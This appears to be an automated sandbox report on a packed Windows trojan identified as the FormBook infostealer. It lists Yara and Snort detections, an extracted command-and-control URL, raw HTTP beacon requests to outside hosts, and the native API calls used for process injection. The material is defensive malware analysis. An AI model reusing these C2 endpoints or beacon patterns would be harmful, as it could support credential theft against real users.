Source: Yara match	File source: 00000011.00000002.900861159.0000000002CC0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000000.725117231.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.737458183.0000000003817000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.738166081.00000000038E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.900522638.0000000000330000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 11.0.AddInProcess32.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.0.AddInProcess32.exe.400000.1.raw.unpack, type: UNPACKEDPE

Machine Learning detection for sample

Show sources

Source: SecuriteInfo.com.Trojan.Packed2.43183.29557.exe

Joe Sandbox ML: detected

Source: 11.0.AddInProcess32.exe.400000.1.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 11.2.AddInProcess32.exe.400000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen

Source: SecuriteInfo.com.Trojan.Packed2.43183.29557.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: SecuriteInfo.com.Trojan.Packed2.43183.29557.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA

Source:	Binary string: AddInProcess32.pdb source: SecuriteInfo.com.Trojan.Packed2.43183.29557.exe, 00000001.00000003.722611270.0000000006220000.00000004.00000001.sdmp, AddInProcess32.exe, systray.exe, 00000011.00000002.900574783.0000000000423000.00000004.00000020.sdmp, AddInProcess32.exe.1.dr
Source:	Binary string: systray.pdb source: AddInProcess32.exe, 0000000B.00000002.803736776.0000000001359000.00000004.00000020.sdmp
Source:	Binary string: wscui.pdbUGP source: explorer.exe, 0000000C.00000000.748974641.0000000005A00000.00000002.00000001.sdmp
Source:	Binary string: systray.pdbGCTL source: AddInProcess32.exe, 0000000B.00000002.803736776.0000000001359000.00000004.00000020.sdmp
Source:	Binary string: wntdll.pdbUGP source: AddInProcess32.exe, 0000000B.00000002.804000123.0000000001790000.00000040.00000001.sdmp, systray.exe, 00000011.00000002.901215283.000000000466F000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: AddInProcess32.exe, systray.exe
Source:	Binary string: AddInProcess32.pdbpw source: SecuriteInfo.com.Trojan.Packed2.43183.29557.exe, 00000001.00000003.722611270.0000000006220000.00000004.00000001.sdmp, AddInProcess32.exe, 0000000B.00000000.725190319.0000000000CD2000.00000002.00020000.sdmp, systray.exe, 00000011.00000002.900574783.0000000000423000.00000004.00000020.sdmp, AddInProcess32.exe.1.dr
Source:	Binary string: wscui.pdb source: explorer.exe, 0000000C.00000000.748974641.0000000005A00000.00000002.00000001.sdmp

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49766 -> 34.102.136.180:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49766 -> 34.102.136.180:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49766 -> 34.102.136.180:80

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor

URLs: www.roamallday.com/sadn/

Source: global traffic	HTTP traffic detected: GET /sadn/?5jDxn=9rYPWNexEp&9r8=cvOZMLUYKOYUB2MIVs3brF1aeCykDgyLTnisf2vSTBUNQvDIkJgvRwpKMlOnwLgVr/YP HTTP/1.1Host: www.granthamrobotics.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /sadn/?9r8=DXfJxxxI+/4CaoDoAzC1V5G6SJQKNuW4mru3KXZlF9SJY6Uq4c9wctugrHKIzz2k7BKt&5jDxn=9rYPWNexEp HTTP/1.1Host: www.mclpay.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: Joe Sandbox View

IP Address: 13.59.53.244 13.59.53.244

Source: global traffic	HTTP traffic detected: GET /sadn/?5jDxn=9rYPWNexEp&9r8=cvOZMLUYKOYUB2MIVs3brF1aeCykDgyLTnisf2vSTBUNQvDIkJgvRwpKMlOnwLgVr/YP HTTP/1.1Host: www.granthamrobotics.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /sadn/?9r8=DXfJxxxI+/4CaoDoAzC1V5G6SJQKNuW4mru3KXZlF9SJY6Uq4c9wctugrHKIzz2k7BKt&5jDxn=9rYPWNexEp HTTP/1.1Host: www.mclpay.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: unknown

DNS traffic detected: queries for: www.granthamrobotics.com

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 10 Jun 2021 14:59:57 GMTContent-Type: text/htmlContent-Length: 153Connection: closeServer: nginx/1.16.1Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.16.1</center></body></html>

Source: explorer.exe, 0000000C.00000000.754561733.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://fontfabrik.com
Source: SecuriteInfo.com.Trojan.Packed2.43183.29557.exe, 00000001.00000003.730902594.0000000006A83000.00000004.00000001.sdmp	String found in binary or memory: http://ns.ado/1
Source: SecuriteInfo.com.Trojan.Packed2.43183.29557.exe, 00000001.00000003.652412615.0000000006A7E000.00000004.00000001.sdmp	String found in binary or memory: http://ns.ado/1P
Source: SecuriteInfo.com.Trojan.Packed2.43183.29557.exe, 00000001.00000003.730902594.0000000006A83000.00000004.00000001.sdmp	String found in binary or memory: http://ns.adobe.c/g
Source: SecuriteInfo.com.Trojan.Packed2.43183.29557.exe, 00000001.00000003.652412615.0000000006A7E000.00000004.00000001.sdmp	String found in binary or memory: http://ns.adobe.c/gP
Source: SecuriteInfo.com.Trojan.Packed2.43183.29557.exe, 00000001.00000003.730902594.0000000006A83000.00000004.00000001.sdmp	String found in binary or memory: http://ns.adobe.cobj
Source: SecuriteInfo.com.Trojan.Packed2.43183.29557.exe, 00000001.00000003.652412615.0000000006A7E000.00000004.00000001.sdmp	String found in binary or memory: http://ns.adobe.cobjP
Source: SecuriteInfo.com.Trojan.Packed2.43183.29557.exe, 00000001.00000003.652216791.0000000006A7E000.00000004.00000001.sdmp	String found in binary or memory: http://ns.d
Source: SecuriteInfo.com.Trojan.Packed2.43183.29557.exe, 00000001.00000002.731660422.0000000002780000.00000004.00000001.sdmp	String found in binary or memory: http://schema.org/WebPage
Source: SecuriteInfo.com.Trojan.Packed2.43183.29557.exe, 00000001.00000002.731639609.0000000002751000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: explorer.exe, 0000000C.00000000.736993153.0000000002B50000.00000002.00000001.sdmp	String found in binary or memory: http://www.%s.comPA
Source: explorer.exe, 0000000C.00000000.754561733.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 0000000C.00000000.754561733.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 0000000C.00000000.754561733.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 0000000C.00000000.754561733.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 0000000C.00000000.754561733.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 0000000C.00000000.754561733.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 0000000C.00000000.754561733.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: explorer.exe, 0000000C.00000000.754561733.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 0000000C.00000000.754561733.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 0000000C.00000000.754561733.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 0000000C.00000000.754561733.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 0000000C.00000000.754561733.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 0000000C.00000000.754561733.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 0000000C.00000000.754561733.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 0000000C.00000000.754561733.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 0000000C.00000000.754561733.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 0000000C.00000000.754561733.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 0000000C.00000000.754561733.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 0000000C.00000000.754561733.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 0000000C.00000000.754561733.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 0000000C.00000000.754561733.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 0000000C.00000000.754561733.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 0000000C.00000000.754561733.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 0000000C.00000000.754561733.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 0000000C.00000000.754561733.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: SecuriteInfo.com.Trojan.Packed2.43183.29557.exe, 00000001.00000002.731639609.0000000002751000.00000004.00000001.sdmp	String found in binary or memory: https://www.google.com
Source: SecuriteInfo.com.Trojan.Packed2.43183.29557.exe, 00000001.00000002.731639609.0000000002751000.00000004.00000001.sdmp	String found in binary or memory: https://www.google.com/

E-Banking Fraud:

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000001.00000002.737256043.00000000037CC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.803111095.0000000001290000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.801838633.0000000001180000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.801642119.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.900861159.0000000002CC0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000000.725117231.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.737458183.0000000003817000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.738166081.00000000038E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.900522638.0000000000330000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 11.0.AddInProcess32.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.0.AddInProcess32.exe.400000.1.raw.unpack, type: UNPACKEDPE

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 00000001.00000002.737256043.00000000037CC000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.737256043.00000000037CC000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000B.00000002.803111095.0000000001290000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000B.00000002.803111095.0000000001290000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000B.00000002.801838633.0000000001180000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000B.00000002.801838633.0000000001180000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000B.00000002.801642119.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000B.00000002.801642119.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000011.00000002.900861159.0000000002CC0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000011.00000002.900861159.0000000002CC0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000B.00000000.725117231.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000B.00000000.725117231.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.737458183.0000000003817000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.737458183.0000000003817000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.738166081.00000000038E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.738166081.00000000038E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000011.00000002.900522638.0000000000330000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000011.00000002.900522638.0000000000330000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 11.0.AddInProcess32.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 11.0.AddInProcess32.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 11.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 11.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 11.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 11.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 11.0.AddInProcess32.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 11.0.AddInProcess32.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group

.NET source code contains very large array initializations

Show sources

Source: SecuriteInfo.com.Trojan.Packed2.43183.29557.exe, j2DC/Rb6y.cs	Large array initialization: .cctor: array initializer size 3852
Source: 1.0.SecuriteInfo.com.Trojan.Packed2.43183.29557.exe.3a0000.0.unpack, j2DC/Rb6y.cs	Large array initialization: .cctor: array initializer size 3852
Source: 1.2.SecuriteInfo.com.Trojan.Packed2.43183.29557.exe.3a0000.0.unpack, j2DC/Rb6y.cs	Large array initialization: .cctor: array initializer size 3852

Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_004181B0 NtCreateFile,	11_2_004181B0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_00418260 NtReadFile,	11_2_00418260
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_004182E0 NtClose,	11_2_004182E0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_00418390 NtAllocateVirtualMemory,	11_2_00418390
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_004181AA NtCreateFile,	11_2_004181AA
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_0041825A NtReadFile,	11_2_0041825A
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_004182E2 NtClose,	11_2_004182E2
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017F9910 NtAdjustPrivilegesToken,LdrInitializeThunk,	11_2_017F9910
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017F99A0 NtCreateSection,LdrInitializeThunk,	11_2_017F99A0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017F9860 NtQuerySystemInformation,LdrInitializeThunk,	11_2_017F9860
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017F9840 NtDelayExecution,LdrInitializeThunk,	11_2_017F9840
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017F98F0 NtReadVirtualMemory,LdrInitializeThunk,	11_2_017F98F0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017F9A50 NtCreateFile,LdrInitializeThunk,	11_2_017F9A50
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017F9A20 NtResumeThread,LdrInitializeThunk,	11_2_017F9A20
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017F9A00 NtProtectVirtualMemory,LdrInitializeThunk,	11_2_017F9A00
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017F9540 NtReadFile,LdrInitializeThunk,	11_2_017F9540
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017F95D0 NtClose,LdrInitializeThunk,	11_2_017F95D0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017F9710 NtQueryInformationToken,LdrInitializeThunk,	11_2_017F9710
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017F9FE0 NtCreateMutant,LdrInitializeThunk,	11_2_017F9FE0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017F97A0 NtUnmapViewOfSection,LdrInitializeThunk,	11_2_017F97A0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017F9780 NtMapViewOfSection,LdrInitializeThunk,	11_2_017F9780
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017F9660 NtAllocateVirtualMemory,LdrInitializeThunk,	11_2_017F9660
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017F96E0 NtFreeVirtualMemory,LdrInitializeThunk,	11_2_017F96E0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017F9950 NtQueueApcThread,	11_2_017F9950
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017F99D0 NtCreateProcessEx,	11_2_017F99D0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017FB040 NtSuspendThread,	11_2_017FB040
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017F9820 NtEnumerateKey,	11_2_017F9820
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017F98A0 NtWriteVirtualMemory,	11_2_017F98A0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017F9B00 NtSetValueKey,	11_2_017F9B00
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017FA3B0 NtGetContextThread,	11_2_017FA3B0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017F9A10 NtQuerySection,	11_2_017F9A10
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017F9A80 NtOpenDirectoryObject,	11_2_017F9A80
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017F9560 NtWriteFile,	11_2_017F9560
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017FAD30 NtSetContextThread,	11_2_017FAD30
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017F9520 NtWaitForSingleObject,	11_2_017F9520
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017F95F0 NtQueryInformationFile,	11_2_017F95F0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017FA770 NtOpenThread,	11_2_017FA770
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017F9770 NtSetInformationFile,	11_2_017F9770
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017F9760 NtOpenProcess,	11_2_017F9760
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017F9730 NtQueryVirtualMemory,	11_2_017F9730
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017FA710 NtOpenProcessToken,	11_2_017FA710
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017F9670 NtQueryInformationProcess,	11_2_017F9670
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017F9650 NtQueryValueKey,	11_2_017F9650
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017F9610 NtEnumerateValueKey,	11_2_017F9610
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017F96D0 NtCreateKey,	11_2_017F96D0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_045B9540 NtReadFile,LdrInitializeThunk,	17_2_045B9540
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_045B95D0 NtClose,LdrInitializeThunk,	17_2_045B95D0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_045B9650 NtQueryValueKey,LdrInitializeThunk,	17_2_045B9650
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_045B9660 NtAllocateVirtualMemory,LdrInitializeThunk,	17_2_045B9660
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_045B96D0 NtCreateKey,LdrInitializeThunk,	17_2_045B96D0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_045B96E0 NtFreeVirtualMemory,LdrInitializeThunk,	17_2_045B96E0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_045B9710 NtQueryInformationToken,LdrInitializeThunk,	17_2_045B9710
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_045B9FE0 NtCreateMutant,LdrInitializeThunk,	17_2_045B9FE0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_045B9780 NtMapViewOfSection,LdrInitializeThunk,	17_2_045B9780
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_045B9840 NtDelayExecution,LdrInitializeThunk,	17_2_045B9840
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_045B9860 NtQuerySystemInformation,LdrInitializeThunk,	17_2_045B9860
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_045B9910 NtAdjustPrivilegesToken,LdrInitializeThunk,	17_2_045B9910
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_045B99A0 NtCreateSection,LdrInitializeThunk,	17_2_045B99A0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_045B9A50 NtCreateFile,LdrInitializeThunk,	17_2_045B9A50
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_045B9560 NtWriteFile,	17_2_045B9560
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_045BAD30 NtSetContextThread,	17_2_045BAD30
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_045B9520 NtWaitForSingleObject,	17_2_045B9520
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_045B95F0 NtQueryInformationFile,	17_2_045B95F0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_045B9670 NtQueryInformationProcess,	17_2_045B9670
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_045B9610 NtEnumerateValueKey,	17_2_045B9610
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_045BA770 NtOpenThread,	17_2_045BA770
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_045B9770 NtSetInformationFile,	17_2_045B9770
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_045B9760 NtOpenProcess,	17_2_045B9760
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_045BA710 NtOpenProcessToken,	17_2_045BA710
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_045B9730 NtQueryVirtualMemory,	17_2_045B9730
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_045B97A0 NtUnmapViewOfSection,	17_2_045B97A0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_045BB040 NtSuspendThread,	17_2_045BB040
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_045B9820 NtEnumerateKey,	17_2_045B9820
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_045B98F0 NtReadVirtualMemory,	17_2_045B98F0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_045B98A0 NtWriteVirtualMemory,	17_2_045B98A0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_045B9950 NtQueueApcThread,	17_2_045B9950
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_045B99D0 NtCreateProcessEx,	17_2_045B99D0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_045B9A10 NtQuerySection,	17_2_045B9A10
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_045B9A00 NtProtectVirtualMemory,	17_2_045B9A00
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_045B9A20 NtResumeThread,	17_2_045B9A20
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_045B9A80 NtOpenDirectoryObject,	17_2_045B9A80
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_045B9B00 NtSetValueKey,	17_2_045B9B00
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_045BA3B0 NtGetContextThread,	17_2_045BA3B0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_02CD82E0 NtClose,	17_2_02CD82E0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_02CD8260 NtReadFile,	17_2_02CD8260
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_02CD8390 NtAllocateVirtualMemory,	17_2_02CD8390
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_02CD81B0 NtCreateFile,	17_2_02CD81B0
